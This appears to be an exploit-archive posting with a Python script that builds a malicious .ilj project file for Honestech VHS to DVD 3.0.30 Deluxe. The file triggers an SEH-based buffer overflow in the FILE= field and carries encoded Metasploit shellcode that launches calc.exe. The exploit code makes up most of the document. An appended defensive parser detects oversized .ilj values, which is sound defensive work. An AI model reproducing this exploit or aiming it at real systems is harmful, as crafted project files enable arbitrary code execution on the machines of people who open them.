
Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)

Posted on 16 September 2010

=================================================================
Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
=================================================================

#!/usr/bin/python
#
# Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Date: September 16, 2010
# Author: Brennon Thomas thomab310@gmail.com
# Software Link: n/a
# Version: <= 3.0.30.0 Deluxe
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
#
# Usage: This python script generates the malicious .ilj project file.
# Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and
# load the corrupt file.
#
# Exploit is for education purposes only. Author takes no responsibility
# for what you do with it.

# Required file text: the INI-like project layout the application expects.
# The FILE= entry in [FILELIST] is the field that overflows; everything
# appended below lands inside its value. Lines are joined with CRLF here,
# which is what the original text-mode write produced on Windows.
header = [
    b"<CAPTURE>",
    b"[MAINDLG]",
    b"PAGE=0",
    b"[AVICODEC]",
    b"VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)",
    b"AUDIOCODEC=MPEG Layer-3",
    b"[WMVINFO]",
    b"TITLE=",
    b"AUTHOR=",
    b"COPYRIGHT=",
    b"DESCRIPTION=",
    b"[CAPTUREINFO]",
    b"OUTPUTFOLDER=E:\\misc\\",
    b"STATE=0,1,1,0,4396,4,1,0,0",
    b"[BURNINFO]",
    b"STATE=0,0,0,0,0,0",
    b"TEMPFOLDER=E:\\misc\\",
    b"VIDEOTSFOLDER=E:\\misc\\",
    b"IMAGEFOLDER=E:\\misc\\",
    b"[FILELIST]",
    b"FILE=E:\\",
]
buf = b"\r\n".join(header)

buf += b"\x90" * 257            # Junk: fills the buffer up to the SEH record
buf += b"\xeb\x08\x90\x90"      # JMP SHORT 8, NOP padding (next SEH pointer)
buf += b"\xba\x25\x31\x58"      # SEH overwrite to POP,POP,RETN in msg723.acm
buf += b"\x90" * 16             # NOP buffer before the payload

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x2c' -t c
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
buf += (b"\xbe\xf9\x89\xfa\xaa\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
        b"\x5d\x31\x75\x13\x83\xed\xfc\x03\x75\xf6\x6b\x0f\x56\xe0\xe5"
        b"\xf0\xa7\xf0\x95\x79\x42\xc1\x87\x1e\x06\x73\x18\x54\x4a\x7f"
        b"\xd3\x38\x7f\xf4\x91\x94\x70\xbd\x1c\xc3\xbf\x3e\x91\xcb\x6c"
        b"\xfc\xb3\xb7\x6e\xd0\x13\x89\xa0\x25\x55\xce\xdd\xc5\x07\x87"
        b"\xaa\x77\xb8\xac\xef\x4b\xb9\x62\x64\xf3\xc1\x07\xbb\x87\x7b"
        b"\x09\xec\x37\xf7\x41\x14\x3c\x5f\x72\x25\x91\x83\x4e\x6c\x9e"
        b"\x70\x24\x6f\x76\x49\xc5\x41\xb6\x06\xf8\x6d\x3b\x56\x3c\x49"
        b"\xa3\x2d\x36\xa9\x5e\x36\x8d\xd3\x84\xb3\x10\x73\x4f\x63\xf1"
        b"\x85\x9c\xf2\x72\x89\x69\x70\xdc\x8e\x6c\x55\x56\xaa\xe5\x58"
        b"\xb9\x3a\xbd\x7e\x1d\x66\x66\x1e\x04\xc2\xc9\x1f\x56\xaa\xb6"
        b"\x85\x1c\x59\xa3\xbc\x7e\x34\x32\x4c\x05\x71\x34\x4e\x06\xd2"
        b"\x5c\x7f\x8d\xbd\x1b\x80\x44\xfa\xd3\xca\xc5\xab\x7b\x93\x9f"
        b"\xe9\xe6\x24\x4a\x2d\x1e\xa7\x7f\xce\xe5\xb7\xf5\xcb\xa2\x7f"
        b"\xe5\xa1\xbb\x15\x09\x15\xbc\x3f\x6a\xf8\x2e\xa3\x43\x9f\xd6"
        b"\x46\x9c\x55")

buf += b"\x90" * (6000 - len(buf))            # NOP buffer: pad the whole buffer out to 6000 bytes
buf += b",0,7462,885953024,4,1,640,480\r\n"   # Required file text: trailing FILE= fields

# Binary mode so the raw bytes are written unchanged on any platform.
f = open("sploit.ilj", "wb")
f.write(buf)
f.close()

# Inj3ct0r.com [2010-09-16]
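As an added defensive example (not part of the original listing and not code from the exploit author), the script below parses the INI-like .ilj layout shown in the exploit and flags any value far longer than a Windows path, which is the condition the generator above creates in the [FILELIST] FILE= entry. The 260-byte limit and both sample project files are assumptions constructed for the example; the parser's treatment of the `<CAPTURE>` marker as a skippable header line is likewise an assumption.

```python
# Added defensive example (not part of the original exploit listing): a
# checker for Honestech .ilj project files that parses the INI-like layout
# shown above and flags values far longer than any legitimate Windows path.
# The 260-byte limit and the two sample files are assumptions/constructed.
import re

# Assumption: a real FILE= path never exceeds MAX_PATH (260). The script
# above places its SEH overwrite roughly 260 bytes into the FILE= value and
# pads to 6000, so this bound flags it while leaving ordinary files alone.
MAX_VALUE_LEN = 260

SECTION_RE = re.compile(br"^\[(?P<name>[^\]]+)\]\s*$")
KEY_RE = re.compile(br"^(?P<key>[A-Z]+)=(?P<value>.*)$", re.DOTALL)


def parse_ilj(data):
    """Split an .ilj body into {section: [(key, value_bytes), ...]}.

    The leading '<CAPTURE>' marker and blank lines are ignored (assumption);
    values stay raw bytes because a malformed file may carry non-text data.
    """
    sections = {}
    current = None
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line.strip() or line.startswith(b"<"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").decode("latin-1")
            sections.setdefault(current, [])
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            key = m.group("key").decode("latin-1")
            sections[current].append((key, m.group("value")))
    return sections


def find_oversized_values(data, limit=MAX_VALUE_LEN):
    """Return [(section, key, length, has_binary)] for every value over limit.

    has_binary is True when the value holds bytes outside printable ASCII,
    which a path or numeric field never legitimately does.
    """
    findings = []
    for section, entries in parse_ilj(data).items():
        for key, value in entries:
            if len(value) > limit:
                has_binary = any(b < 0x20 or b > 0x7e for b in bytearray(value))
                findings.append((section, key, len(value), has_binary))
    return findings


# Constructed samples: a plausible benign project and a file shaped like the
# one the script above writes (oversized FILE= value padded with 0x90 bytes).
BENIGN_ILJ = (b"<CAPTURE>\r\n[MAINDLG]\r\nPAGE=0\r\n[FILELIST]\r\n"
              b"FILE=E:\\capture01.avi,0,7462,885953024,4,1,640,480\r\n")
MALFORMED_ILJ = (b"<CAPTURE>\r\n[FILELIST]\r\nFILE=E:\\" + b"\x90" * 300 +
                 b",0,7462,885953024,4,1,640,480\r\n")


def scan_report(data):
    """Human-readable verdict for one file body."""
    hits = find_oversized_values(data)
    if not hits:
        return "clean"
    return "; ".join("[%s] %s: %d bytes%s" % (s, k, n, " (binary)" if b else "")
                     for s, k, n, b in hits)


if __name__ == "__main__":
    print("benign:    " + scan_report(BENIGN_ILJ))
    print("malformed: " + scan_report(MALFORMED_ILJ))
```

Run it as-is to see the two verdicts, or call `scan_report(open(path, "rb").read())` on a project file pulled from a mail gateway or file share; the length check is deliberately format-aware so that a long but legitimate comment field in another section can be whitelisted by key rather than by raising the global limit.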

 
